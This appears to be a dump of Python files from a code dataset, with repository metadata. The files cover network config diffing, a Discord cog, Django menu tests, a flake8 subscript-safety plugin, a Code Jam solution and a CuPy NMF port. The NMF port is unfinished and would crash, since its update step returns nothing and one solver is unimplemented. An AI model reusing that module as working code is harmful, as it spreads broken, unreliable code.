waddr.append({'address': d['address']})
set_w = set(tuple(sorted(d.items())) for d in waddr) if waddr else set()
if h:
for d in h:
haddr.append({'address': d['address']})
set_h = set(tuple(sorted(d.items())) for d in haddr) if haddr else set()
intersection = set_w.intersection(set_h)
for element in intersection:
intersect.append(dict((x, y) for x, y in element))
return intersect
def add_commands(self, diff, name):
commands = []
if not diff:
return commands
if 'ipv4' in diff:
commands.extend(self.generate_commands(diff['ipv4'], flag='ipv4'))
if 'ipv6' in diff:
commands.extend(self.generate_commands(diff['ipv6'], flag='ipv6'))
if commands:
commands.insert(0, 'interface ' + name)
return commands
def generate_commands(self, d, flag=None):
commands = []
for i in d:
cmd = ''
if flag == 'ipv4':
cmd = 'ip address '
elif flag == 'ipv6':
cmd = 'ipv6 address '
cmd += i['address']
if 'secondary' in i and i['secondary'] is True:
cmd += ' ' + 'secondary'
if 'tag' in i:
cmd += ' ' + 'tag ' + str(i['tag'])
elif 'tag' in i:
cmd += ' ' + 'tag ' + str(i['tag'])
commands.append(cmd)
return commands
def set_commands(self, w, have):
commands = []
obj_in_have = search_obj_in_list(w['name'], have, 'name')
if not obj_in_have:
commands = self.add_commands(w, w['name'])
else:
diff = {}
diff.update({'ipv4': self.diff_list_of_dicts(w.get('ipv4'), obj_in_have.get('ipv4'))})
diff.update({'ipv6': self.diff_list_of_dicts(w.get('ipv6'), obj_in_have.get('ipv6'))})
commands = self.add_commands(diff, w['name'])
return commands
| 4,146 | 0 | 297 |
c60315315b1b0a6ab3d7ae3c01b28dc0330bc248 | 286 | py | Python | src/startup_tasks.py | bbrietzke/amina-naidu | 728748aaaa5a8125215ebc47303ea32d983942ce | [
"BSD-3-Clause"
] | null | null | null | src/startup_tasks.py | bbrietzke/amina-naidu | 728748aaaa5a8125215ebc47303ea32d983942ce | [
"BSD-3-Clause"
] | null | null | null | src/startup_tasks.py | bbrietzke/amina-naidu | 728748aaaa5a8125215ebc47303ea32d983942ce | [
"BSD-3-Clause"
] | null | null | null | from discord.ext.commands import Cog
from discord.utils import get
from discord.ext import tasks
import logging
logger = logging.getLogger('tasks')
# https://discord.gg/C6AQaJcDdn | 22 | 48 | 0.737762 | from discord.ext.commands import Cog
from discord.utils import get
from discord.ext import tasks
import logging
logger = logging.getLogger('tasks')
class StartupTasks(Cog, name = 'Startup Tasks'):
    """Discord Cog grouping tasks that run when the bot starts up."""
    def __init__(self, bot):
        # Keep a private reference to the bot so startup tasks can use it.
        self.__bot = bot
# https://discord.gg/C6AQaJcDdn | 28 | 27 | 49 |
caba3cec1e39700147f2e9c58dd5f0d946b4fcb4 | 109 | py | Python | flask_authz/__init__.py | robotoer/flask-authz | 068cd6496e9a116cd6bc6ef21d2c8c4bfff0bb49 | [
"Apache-2.0"
] | 93 | 2019-06-26T03:32:34.000Z | 2022-03-28T03:26:33.000Z | flask_authz/__init__.py | robotoer/flask-authz | 068cd6496e9a116cd6bc6ef21d2c8c4bfff0bb49 | [
"Apache-2.0"
] | 42 | 2019-08-05T02:16:20.000Z | 2022-02-19T08:45:51.000Z | flask_authz/__init__.py | robotoer/flask-authz | 068cd6496e9a116cd6bc6ef21d2c8c4bfff0bb49 | [
"Apache-2.0"
] | 35 | 2019-07-19T18:04:22.000Z | 2022-03-04T00:14:27.000Z | from .casbin_enforcer import CasbinEnforcer # noqa: F401
from .casbin_enforcer import Watcher # noqa: F401
| 36.333333 | 57 | 0.798165 | from .casbin_enforcer import CasbinEnforcer # noqa: F401
from .casbin_enforcer import Watcher # noqa: F401
| 0 | 0 | 0 |
03f5aff96b74d6b68c9f99e6aa11c484f8ae98a2 | 4,376 | py | Python | devilry/devilry_admin/tests/cradminextensions/test_devilry_crmenu_admin.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | null | null | null | devilry/devilry_admin/tests/cradminextensions/test_devilry_crmenu_admin.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | null | null | null | devilry/devilry_admin/tests/cradminextensions/test_devilry_crmenu_admin.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | null | null | null | import mock
from django import test
from model_mommy import mommy
from devilry.devilry_admin.cradminextensions import devilry_crmenu_admin
| 56.102564 | 94 | 0.747258 | import mock
from django import test
from model_mommy import mommy
from devilry.devilry_admin.cradminextensions import devilry_crmenu_admin
class TestMenu(test.TestCase):
    """Tests for the admin crmenu breadcrumb items.

    Each test mocks the cradmin instance so that
    get_devilryrole_for_requestuser() returns a fixed role, then checks the
    breadcrumb item's label or whether it is included at all for that role.
    """
    def test_add_subject_breadcrumb_item_label(self):
        testsubject = mommy.make('core.Subject', short_name='testsubject')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
        self.assertEqual('testsubject', menuitem.label)
    def test_add_subject_breadcrumb_item_include_devilryrole_departmentadmin(self):
        testsubject = mommy.make('core.Subject')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
        self.assertIsNotNone(menuitem)
    def test_add_subject_breadcrumb_item_include_devilryrole_subjectadmin(self):
        testsubject = mommy.make('core.Subject')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
        self.assertIsNotNone(menuitem)
    def test_add_subject_breadcrumb_item_exclude_devilryrole_periodadmin(self):
        # Period admins should not get a subject breadcrumb item at all.
        testsubject = mommy.make('core.Subject')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
        self.assertIsNone(menuitem)
    def test_add_period_breadcrumb_item_label_devilryrole_departmentadmin(self):
        testperiod = mommy.make('core.Period',
                                parentnode__short_name='testsubject',
                                short_name='testperiod')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_period_breadcrumb_item(period=testperiod)
        self.assertEqual('testperiod', menuitem.label)
    def test_add_period_breadcrumb_item_label_devilryrole_subjectadmin(self):
        testperiod = mommy.make('core.Period',
                                parentnode__short_name='testsubject',
                                short_name='testperiod')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_period_breadcrumb_item(period=testperiod)
        self.assertEqual('testperiod', menuitem.label)
    def test_add_period_breadcrumb_item_label_devilryrole_periodadmin(self):
        # Period admins see the fully-qualified "subject.period" label since
        # they have no separate subject breadcrumb item.
        testperiod = mommy.make('core.Period',
                                parentnode__short_name='testsubject',
                                short_name='testperiod')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_period_breadcrumb_item(period=testperiod)
        self.assertEqual('testsubject.testperiod', menuitem.label)
    def test_add_assignment_breadcrumb_item_label(self):
        testassignment = mommy.make('core.Assignment', short_name='testassignment')
        mock_cradmin_instance = mock.MagicMock()
        mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
        menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
        menuitem = menu.add_assignment_breadcrumb_item(assignment=testassignment)
        self.assertEqual('testassignment', menuitem.label)
| 3,988 | 9 | 238 |
fe1f740fd51bf888fbacf441f65fbe1a286f3389 | 9,577 | py | Python | flake8_prevent_fails/__init__.py | Atterratio/flake8-prevent-fails | 068502a1542d03e60d9d9a9853dfdc1f0883f9cb | [
"MIT"
] | null | null | null | flake8_prevent_fails/__init__.py | Atterratio/flake8-prevent-fails | 068502a1542d03e60d9d9a9853dfdc1f0883f9cb | [
"MIT"
] | null | null | null | flake8_prevent_fails/__init__.py | Atterratio/flake8-prevent-fails | 068502a1542d03e60d9d9a9853dfdc1f0883f9cb | [
"MIT"
] | null | null | null | import ast
__version__ = '0.0.5'
__all__ = ('FailsChecker', )
MESSAGES = {
'PF101': 'PF101 Potential IndexError fail.',
'PF102': 'PF102 Potential KeyError fail. You can replace this with `dict.get(key, failback_value)`',
'PF103': 'PF103 Potential IndexError or KeyError fail.',
}
| 41.280172 | 104 | 0.446695 | import ast
__version__ = '0.0.5'
__all__ = ('FailsChecker', )
MESSAGES = {
'PF101': 'PF101 Potential IndexError fail.',
'PF102': 'PF102 Potential KeyError fail. You can replace this with `dict.get(key, failback_value)`',
'PF103': 'PF103 Potential IndexError or KeyError fail.',
}
class PluginVisitor(ast.NodeVisitor):
    """AST visitor that flags subscript accesses (``x[i]``/``d[k]``) which may
    raise IndexError/KeyError and are not guarded by a ``try/except``, a safe
    ``if`` test, or a ``for`` loop over the subscripted object.

    Relies on every node carrying a ``pf_parent`` back-reference (set by
    ``FailsChecker.__init__``) so checks can walk up the tree.
    Collected errors are ``(lineno, col, message, checker_type)`` tuples.
    """
    def __init__(self):
        self.errors = []

    def check_exception_catch(self, node, exception_types):
        """Return True if an enclosing try/except handles one of
        *exception_types* (or is a catch-all handler)."""
        # TODO fix if indexing in try:else: statement
        parent = node
        while True:
            if getattr(parent, 'pf_parent', None):
                parent = parent.pf_parent
                if isinstance(parent, ast.Try):
                    for handler in parent.handlers:
                        if handler.type:
                            try:
                                if handler.type.id in exception_types:
                                    # error handled in specific exception
                                    return True
                            except AttributeError:
                                # handler.type has no .id: may be a tuple of
                                # exception types
                                if isinstance(handler.type, ast.Tuple):
                                    for handler_type in handler.type.elts:
                                        if handler_type.id in exception_types:
                                            # error handled as one of list of errors
                                            return True
                        else:
                            # error handled in non specific exception (bare except)
                            return True
            else:
                # reached the tree root: no error handler
                return False

    def check_safe_if(self, node):
        """Return True if an enclosing ``if`` makes the subscript safe:
        either ``if d.get(key, ...)`` guarding ``d[key]``, or a bounds test
        like ``if i < len(xs)`` / ``if len(xs) > i`` guarding ``xs[i]``."""
        parent = node
        while True:
            if getattr(parent, 'pf_parent', None):
                parent = parent.pf_parent
                if isinstance(parent, ast.If):
                    # name of the object being subscripted
                    indexed_obj = node.pf_parent.value.id
                    if isinstance(parent.test, ast.Call):
                        # Check safe if for dict like this `if test_dict.get(key, None):`
                        checked_obj = parent.test.func.value.id
                        func = parent.test.func.attr
                        args = parent.test.args
                        if indexed_obj == checked_obj and func == 'get':
                            if isinstance(node.pf_parent.slice.value, ast.Str):
                                # dict key set as string
                                dict_key = node.pf_parent.slice.value.s
                                checked_key = args[0].s
                                if dict_key == checked_key:
                                    return True
                            elif isinstance(node.pf_parent.slice.value, ast.Name):
                                # dict key set as variable
                                dict_key = node.pf_parent.slice.value.id
                                try:
                                    checked_key = args[0].id
                                except (IndexError, AttributeError):
                                    pass
                                else:
                                    if dict_key == checked_key:
                                        return True
                    elif isinstance(parent.test, ast.Compare):
                        # Check safe if for list like this `if index < len(test):`
                        compare_operator = parent.test.ops[0]
                        if isinstance(compare_operator, ast.Lt):
                            # `index < len(xs)` form
                            try:
                                func = parent.test.comparators[0].func.id
                            except (IndexError, AttributeError):
                                pass
                            else:
                                if func == 'len':
                                    if isinstance(node.pf_parent.slice.value, ast.Num):
                                        checked_obj = parent.test.comparators[0].args[0].id
                                        if indexed_obj == checked_obj:
                                            index = node.pf_parent.slice.value.n
                                            compare_index = parent.test.left.n
                                            if index == compare_index:
                                                return True
                                    elif isinstance(node.pf_parent.slice.value, ast.Name):
                                        checked_obj = parent.test.comparators[0].args[0].id
                                        if indexed_obj == checked_obj:
                                            index = node.pf_parent.slice.value.id
                                            compare_index = parent.test.left.id
                                            if index == compare_index:
                                                return True
                        elif isinstance(compare_operator, ast.Gt):
                            # `len(xs) > index` form
                            try:
                                func = parent.test.left.func.id
                            except AttributeError:
                                pass
                            else:
                                if func == 'len':
                                    if isinstance(node.pf_parent.slice.value, ast.Num):
                                        checked_obj = parent.test.left.args[0].id
                                        if indexed_obj == checked_obj:
                                            index = node.pf_parent.slice.value.n
                                            compare_index = parent.test.comparators[0].n
                                            if index == compare_index:
                                                return True
                                    elif isinstance(node.pf_parent.slice.value, ast.Name):
                                        # NOTE(review): uses parent.test.args here,
                                        # unlike parent.test.left.args above — confirm
                                        # intended.
                                        checked_obj = parent.test.args[0].id
                                        if indexed_obj == checked_obj:
                                            index = node.pf_parent.slice.value.id
                                            compare_index = parent.test.comparators[0].id
                                            if index == compare_index:
                                                return True
            else:
                return False

    def check_safe_for(self, node):
        """Return True when the subscript key is the loop variable of an
        enclosing ``for key in obj:`` over the same object (``obj[key]``)."""
        parent = node
        while True:
            if getattr(parent, 'pf_parent', None):
                parent = parent.pf_parent
                if isinstance(parent, ast.For):
                    indexed_obj = node.pf_parent.value.id
                    try:
                        key = node.value.id
                    except AttributeError:
                        pass
                    else:
                        if isinstance(parent.iter, ast.Name):
                            iter_obj = parent.iter.id
                            iter_var = parent.target.id
                            if indexed_obj == iter_obj and key == iter_var:
                                return True
            else:
                return False

    def handle_num(self, node):
        """Numeric subscript (``xs[0]``): report PF101 unless guarded."""
        exception_types = ['IndexError']
        error = (
            node.value.lineno,
            node.value.col_offset,
            MESSAGES.get('PF101'),
            type(self)
        )
        error_handled = self.check_exception_catch(node, exception_types)
        if not error_handled:
            error_handled = self.check_safe_if(node)
        if not error_handled:
            self.errors.append(error)

    def handle_str(self, node):
        """String-key subscript (``d['k']``): report PF102 unless guarded."""
        exception_types = ['KeyError']
        error = (
            node.value.lineno,
            node.value.col_offset,
            MESSAGES.get('PF102'),
            type(self)
        )
        error_handled = self.check_exception_catch(node, exception_types)
        if not error_handled:
            error_handled = self.check_safe_if(node)
        if not error_handled:
            self.errors.append(error)

    def handle_name(self, node):
        """Variable subscript (``obj[key]``): could be either error; report
        PF103 unless guarded by try/except, a safe if, or a safe for."""
        exception_types = ['IndexError', 'KeyError']
        error = (
            node.value.lineno,
            node.value.col_offset,
            MESSAGES.get('PF103'),
            type(self)
        )
        error_handled = self.check_exception_catch(node, exception_types)
        if not error_handled:
            error_handled = self.check_safe_if(node)
        if not error_handled:
            error_handled = self.check_safe_for(node)
        if not error_handled:
            self.errors.append(error)

    def visit_Index(self, node):
        """Dispatch on the kind of subscript index."""
        if isinstance(node.value, ast.Num):
            self.handle_num(node)
        elif isinstance(node.value, ast.Str):
            self.handle_str(node)
        elif isinstance(node.value, ast.Name):
            self.handle_name(node)
        self.generic_visit(node)

    def generic_visit(self, node):
        # No extra behavior; kept for symmetry with visit_Index.
        super().generic_visit(node)
class FailsChecker(object):
    """flake8 plugin entry point: annotates the AST with parent links and
    runs :class:`PluginVisitor` over it, yielding the collected errors."""
    name = 'flake8-prevent-fails'
    version = __version__

    def __init__(self, tree, filename, tokens):
        # Give every node a `pf_parent` back-reference so the visitor can
        # walk upwards from a subscript to its enclosing try/if/for.
        for parent_node in ast.walk(tree):
            for child_node in ast.iter_child_nodes(parent_node):
                child_node.pf_parent = parent_node
        self.tree = tree
        self.filename = filename
        self.tokens = tokens

    def check_tree(self):
        """Visit the whole tree and return the list of collected errors."""
        visitor = PluginVisitor()
        visitor.visit(self.tree)
        return visitor.errors

    def run(self):
        """flake8 hook: yield each error tuple."""
        yield from self.check_tree()
| 8,830 | 163 | 288 |
9bfb7d2af35b5044c0b51f83cbd723b998930299 | 2,764 | py | Python | Cruise Control/Solution.py | YIWEI-CHEN/google_code_jam_practice_session_2018 | a0fd32911e10b69116c2923ab1c9e58e4e02fdde | [
"MIT"
] | null | null | null | Cruise Control/Solution.py | YIWEI-CHEN/google_code_jam_practice_session_2018 | a0fd32911e10b69116c2923ab1c9e58e4e02fdde | [
"MIT"
] | null | null | null | Cruise Control/Solution.py | YIWEI-CHEN/google_code_jam_practice_session_2018 | a0fd32911e10b69116c2923ab1c9e58e4e02fdde | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 15:18:09 2018
@author: yiwei
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 06:11:18 2018
@author: yiwei
"""
from copy import deepcopy
if __name__ == '__main__':
FROM_STDIN = True
# FROM_STDIN = False
horse_list = []
if FROM_STDIN:
readline = input
else:
name = 'A-large-practice.in'
f = open(name, 'r')
readline = f.readline
t = int(readline())
for i in range(1, t+1):
destination, num_horses = list(map(float, readline().split(' ')))
# Parse horse
horse_list = []
for h in range(int(num_horses)):
location, speed = list(map(float, readline().split(' ')))
horse_list.append(Horse(location, speed))
collapse_time = 0
output = calculate_speed(destination, horse_list, collapse_time)
print("Case #{}: {}".format(i, output))
if not FROM_STDIN:
f.close()
| 30.043478 | 111 | 0.58864 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 15:18:09 2018
@author: yiwei
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 1 06:11:18 2018
@author: yiwei
"""
from copy import deepcopy
class Horse(object):
    """A horse on the track, described by its current location and speed."""

    def __init__(self, location, speed):
        self.location = location
        self.speed = speed

    def __str__(self):
        attrs = ', '.join(
            '{}={}'.format(key, value) for key, value in self.__dict__.items())
        return 'Horse(' + attrs + ')'
def str_list(l):
    """Render *l* with one element per line inside brackets (debug helper)."""
    rendered = [str(element) for element in l]
    return '[' + '\n '.join(rendered) + ']'
def calculate_speed(destination, horse_list, collapse_time):
    """Return the cruise speed: destination / total travel time, where the
    fastest horse repeatedly slows to the speed of the horse it catches.

    Recursive: each call removes at least one horse (or merges two), until a
    single horse remains.  NOTE: mutates *horse_list* in place.

    :param destination: finish-line position
    :param horse_list: list of Horse objects (mutated)
    :param collapse_time: time already accumulated in earlier merges
    """
    horse_list.sort(key=lambda h: h.location)
    # print(collapse_time, str_list(horse_list))
    num_horses = len(horse_list)
    if num_horses == 1:
        # Base case: remaining time is distance / speed for the last horse.
        horse = horse_list[0]
        t_dest = (destination - horse.location) / horse.speed
        total_time = t_dest + collapse_time
        return destination / total_time
    fastest_horse = max(horse_list, key=lambda h: h.speed)
    idx = horse_list.index(fastest_horse)
    if idx == num_horses - 1:
        # Fastest horse is in front: it never catches anyone, drop it.
        horse_list.pop(idx)
    else:
        next_horse = horse_list[idx + 1]
        if next_horse.speed == fastest_horse.speed:
            # Same speed ahead: none of the horses in front matter.
            for i in range(num_horses - 1 , idx, -1):
                horse_list.pop(i)
        else:
            # Time for the fastest horse to catch the (slower) horse ahead.
            t_catch = (next_horse.location - fastest_horse.location) / (fastest_horse.speed - next_horse.speed)
            location_catch = next_horse.location + next_horse.speed * t_catch
            if location_catch <= destination:
                # Catch happens before the finish line: advance the whole
                # field by t_catch and merge the two horses (fastest slows).
                collapse_time += t_catch
                horse_list.pop(idx + 1)
                for horse in horse_list:
                    horse.location = horse.location + horse.speed * t_catch
                fastest_horse.speed = next_horse.speed
            else:
                # Catch would happen past the finish line: horses ahead of
                # the fastest one are irrelevant.
                for i in range(num_horses - 1 , idx, -1):
                    horse_list.pop(i)
    return calculate_speed(destination, horse_list, collapse_time)
if __name__ == '__main__':
    # Toggle between reading test cases from stdin and from a file.
    FROM_STDIN = True
    # FROM_STDIN = False
    horse_list = []
    if FROM_STDIN:
        readline = input
    else:
        name = 'A-large-practice.in'
        f = open(name, 'r')
        readline = f.readline
    # First line: number of test cases.
    t = int(readline())
    for i in range(1, t+1):
        destination, num_horses = list(map(float, readline().split(' ')))
        # Parse horse
        horse_list = []
        for h in range(int(num_horses)):
            location, speed = list(map(float, readline().split(' ')))
            horse_list.append(Horse(location, speed))
        collapse_time = 0
        output = calculate_speed(destination, horse_list, collapse_time)
        print("Case #{}: {}".format(i, output))
    if not FROM_STDIN:
        f.close()
2625845330bef60b1eb6182c371d9b13032bb229 | 8,576 | py | Python | measurexp/NMF.py | bcl-group/measurexp | 66ab471dad2534ec48d13d0546ee3a4f0eb46a91 | [
"MIT"
] | null | null | null | measurexp/NMF.py | bcl-group/measurexp | 66ab471dad2534ec48d13d0546ee3a4f0eb46a91 | [
"MIT"
] | null | null | null | measurexp/NMF.py | bcl-group/measurexp | 66ab471dad2534ec48d13d0546ee3a4f0eb46a91 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn import decomposition
# NMF
from sklearn._config import config_context
from sklearn.decomposition._nmf \
import _beta_divergence, \
_check_string_param, \
_check_init, \
_initialize_nmf, \
_compute_regularization
from sklearn.utils.validation \
import check_array, \
check_non_negative, \
check_random_state
from scipy import sparse
# from scipy.sparse.base import issparse
# import warnings
import numbers
# from sklearn.decomposition._nmf import _initialize_nmf as init_NMF
import cupy as cp
X = np.array([[1, 1], [2, 1], [3, 1.2], [4, 1], [5, 0.8], [6, 1]])
model = cuNMF(init='nndsvd')
model.fit_transform(X)
# decomposition.NMF()
| 38.285714 | 79 | 0.548158 | import numpy as np
from sklearn import decomposition
# NMF
from sklearn._config import config_context
from sklearn.decomposition._nmf \
import _beta_divergence, \
_check_string_param, \
_check_init, \
_initialize_nmf, \
_compute_regularization
from sklearn.utils.validation \
import check_array, \
check_non_negative, \
check_random_state
from scipy import sparse
# from scipy.sparse.base import issparse
# import warnings
import numbers
# from sklearn.decomposition._nmf import _initialize_nmf as init_NMF
import cupy as cp
def cupy_safe_sparse_dot(a, b, *, dense_output=False):
    """Dot product that handles the sparse-matrix cases correctly.

    Port of sklearn's ``safe_sparse_dot`` intended for CuPy arrays.
    NOTE(review): the dense 3D+ branch still calls ``np.dot`` — confirm that
    is intended for CuPy inputs.
    """
    if a.ndim > 2 or b.ndim > 2:
        if sparse.issparse(a):
            # sparse is always 2D. Implies b is 3D+
            # [i, j] @ [k, ..., l, m, n] -> [i, k, ..., l, n]
            b_ = cp.rollaxis(b, -2)
            b_2d = b_.reshape((b.shape[-2], -1))
            ret = a @ b_2d
            ret = ret.reshape(a.shape[0], *b_.shape[1:])
        elif sparse.issparse(b):
            # sparse is always 2D. Implies a is 3D+
            # [k, ..., l, m] @ [i, j] -> [k, ..., l, j]
            a_2d = a.reshape(-1, a.shape[-1])
            ret = a_2d @ b
            ret = ret.reshape(*a.shape[:-1], b.shape[1])
        else:
            ret = np.dot(a, b)
    else:
        ret = a @ b
    # Only densify when both inputs were sparse and the caller asked for it.
    if (sparse.issparse(a) and sparse.issparse(b)
            and dense_output and hasattr(ret, "toarray")):
        return ret.toarray()
    return ret
def _cupy_update_coordinate_descent(X, W, Ht, l1_reg, l2_reg, shuffle,
                                    random_state):
    """One coordinate-descent sweep updating W in place (CuPy port of
    sklearn's ``_update_coordinate_descent``).

    NOTE(review): the final kernel call is commented out, so this function
    currently returns ``None``; the caller does ``violation += ...`` and will
    raise TypeError.  The port is unfinished — the cython
    ``_update_cdnmf_fast`` kernel has no CuPy equivalent here.
    """
    n_components = Ht.shape[1]
    HHt = cp.dot(Ht.T, Ht)
    XHt = cupy_safe_sparse_dot(X, Ht)
    # L2 regularization corresponds to increase of the diagonal of HHt
    if l2_reg != 0.:
        # adds l2_reg only on the diagonal
        HHt.flat[::n_components + 1] += l2_reg
    # L1 regularization corresponds to decrease of each element of XHt
    if l1_reg != 0.:
        XHt -= l1_reg
    if shuffle:
        permutation = random_state.permutation(n_components)
    else:
        permutation = np.arange(n_components)
    # The following seems to be required on 64-bit Windows w/ Python 3.5.
    permutation = np.asarray(permutation, dtype=np.intp)
    # return _update_cdnmf_fast(W, HHt, XHt, permutation)
def _cupy_fit_coordinate_descent(X, W, H, tol=1e-4, max_iter=200, l1_reg_W=0,
                                 l1_reg_H=0, l2_reg_W=0, l2_reg_H=0,
                                 update_H=True, verbose=0, shuffle=False,
                                 random_state=None):
    """Coordinate-descent NMF loop (CuPy port of sklearn's
    ``_fit_coordinate_descent``).  Returns ``(W, H, n_iter)``.

    NOTE(review): the H update is commented out, so H is never refined; and
    ``violation_init`` is only bound on the first iteration (NameError if
    ``max_iter < 1``).
    """
    Ht = check_array(H.T, order='C')
    X = check_array(X, accept_sparse='csr')
    rng = check_random_state(random_state)
    # Move operands onto the GPU.
    Ht = cp.asarray(Ht)
    W = cp.asarray(W)
    X = cp.asarray(X)
    for n_iter in range(1, max_iter + 1):
        violation = 0.
        # Update W
        violation += _cupy_update_coordinate_descent(X, W, Ht, l1_reg_W,
                                                     l2_reg_W, shuffle, rng)
        # Update H
        if update_H:
            # violation += _update_coordinate_descent(X.T, Ht, W, l1_reg_H,
            #                                         l2_reg_H, shuffle, rng)
            pass
        if n_iter == 1:
            violation_init = violation
        if violation_init == 0:
            break
        if verbose:
            print("violation:", violation / violation_init)
        # Converged when the relative violation drops below tol.
        if violation / violation_init <= tol:
            if verbose:
                print("Converged at iteration", n_iter + 1)
            break
    return W, Ht.T, n_iter
def cupy_non_negative_factorization(X, W=None, H=None, n_components=None, *,
                                    init='warn', update_H=True, solver='cd',
                                    beta_loss='frobenius', tol=1e-4,
                                    max_iter=200, alpha=0., l1_ratio=0.,
                                    regularization=None, random_state=None,
                                    verbose=0, shuffle=False):
    """CuPy-backed copy of sklearn's ``non_negative_factorization``: validate
    inputs, initialize W/H, then run the GPU coordinate-descent solver.

    Returns ``(W, H, n_iter)``.  NOTE(review): only ``solver='cd'`` is
    implemented; the 'mu' branch just prints a "not implemented" message and
    leaves ``n_iter`` unbound, so the function raises NameError afterwards.
    """
    X = check_array(X, accept_sparse=('csr', 'csc'),
                    dtype=[np.float64, np.float32])
    check_non_negative(X, "NMF (input X)")
    beta_loss = _check_string_param(solver, regularization, beta_loss, init)
    if X.min() == 0 and beta_loss <= 0:
        raise ValueError("When beta_loss <= 0 and X contains zeros, "
                         "the solver may diverge. Please add small values to "
                         "X, or use a positive beta_loss.")
    n_samples, n_features = X.shape
    if n_components is None:
        n_components = n_features
    if not isinstance(n_components, numbers.Integral) or n_components <= 0:
        raise ValueError("Number of components must be a positive integer;"
                         " got (n_components=%r)" % n_components)
    if not isinstance(max_iter, numbers.Integral) or max_iter < 0:
        raise ValueError("Maximum number of iterations must be a positive "
                         "integer; got (max_iter=%r)" % max_iter)
    if not isinstance(tol, numbers.Number) or tol < 0:
        raise ValueError("Tolerance for stopping criteria must be "
                         "positive; got (tol=%r)" % tol)
    # check W and H, or initialize them
    if init == 'custom' and update_H:
        _check_init(H, (n_components, n_features), "NMF (input H)")
        _check_init(W, (n_samples, n_components), "NMF (input W)")
        if H.dtype != X.dtype or W.dtype != X.dtype:
            raise TypeError("H and W should have the same dtype as X. Got "
                            "H.dtype = {} and W.dtype = {}."
                            .format(H.dtype, W.dtype))
    elif not update_H:
        _check_init(H, (n_components, n_features), "NMF (input H)")
        if H.dtype != X.dtype:
            raise TypeError("H should have the same dtype as X. Got H.dtype = "
                            "{}.".format(H.dtype))
        # 'mu' solver should not be initialized by zeros
        if solver == 'mu':
            avg = np.sqrt(X.mean() / n_components)
            W = np.full((n_samples, n_components), avg, dtype=X.dtype)
        else:
            W = np.zeros((n_samples, n_components), dtype=X.dtype)
    else:
        W, H = _initialize_nmf(X, n_components, init=init,
                               random_state=random_state)
    l1_reg_W, l1_reg_H, l2_reg_W, l2_reg_H = _compute_regularization(
        alpha, l1_ratio, regularization)
    if solver == 'cd':
        W, H, n_iter = _cupy_fit_coordinate_descent(X, W, H, tol, max_iter,
                                                    l1_reg_W, l1_reg_H,
                                                    l2_reg_W, l2_reg_H,
                                                    update_H=update_H,
                                                    verbose=verbose,
                                                    shuffle=shuffle,
                                                    random_state=random_state)
    elif solver == 'mu':
        print('未実装 (solver == \'mu\')')
    else:
        raise ValueError("Invalid solver parameter '%s'." % solver)
    if n_iter == max_iter and tol > 0:
        # warnings.warn("Maximum number of iterations %d reached."
        #               "Increase it to"
        #               " improve convergence." % max_iter, ConvergenceWarning)
        pass
    return W, H, n_iter
class cuNMF(decomposition.NMF):
    """sklearn ``NMF`` subclass whose ``fit_transform`` routes factorization
    through :func:`cupy_non_negative_factorization` (GPU solver)."""

    def fit_transform(self, X, y=None, W=None, H=None):
        """Learn the NMF model for X and return the transformed data W."""
        X = self._validate_data(X, accept_sparse=('csr', 'csc'),
                                dtype=[np.float64, np.float32])
        # assume_finite skips redundant NaN/inf checks inside the solver.
        with config_context(assume_finite=True):
            W, H, n_iter_ = cupy_non_negative_factorization(
                X=X, W=W, H=H, n_components=self.n_components, init=self.init,
                update_H=True, solver=self.solver, beta_loss=self.beta_loss,
                tol=self.tol, max_iter=self.max_iter, alpha=self.alpha,
                l1_ratio=self.l1_ratio, regularization=self.regularization,
                random_state=self.random_state, verbose=self.verbose,
                shuffle=self.shuffle)
        self.reconstruction_err_ = _beta_divergence(X, W, H, self.beta_loss,
                                                    square_root=True)
        self.n_components_ = H.shape[0]
        self.components_ = H
        self.n_iter_ = n_iter_
        return W
        # return super().fit_transform(X, y, W, H)
# Module-level smoke test: factorize a tiny matrix with NNDSVD init.
X = np.array([[1, 1], [2, 1], [3, 1.2], [4, 1], [5, 0.8], [6, 1]])
model = cuNMF(init='nndsvd')
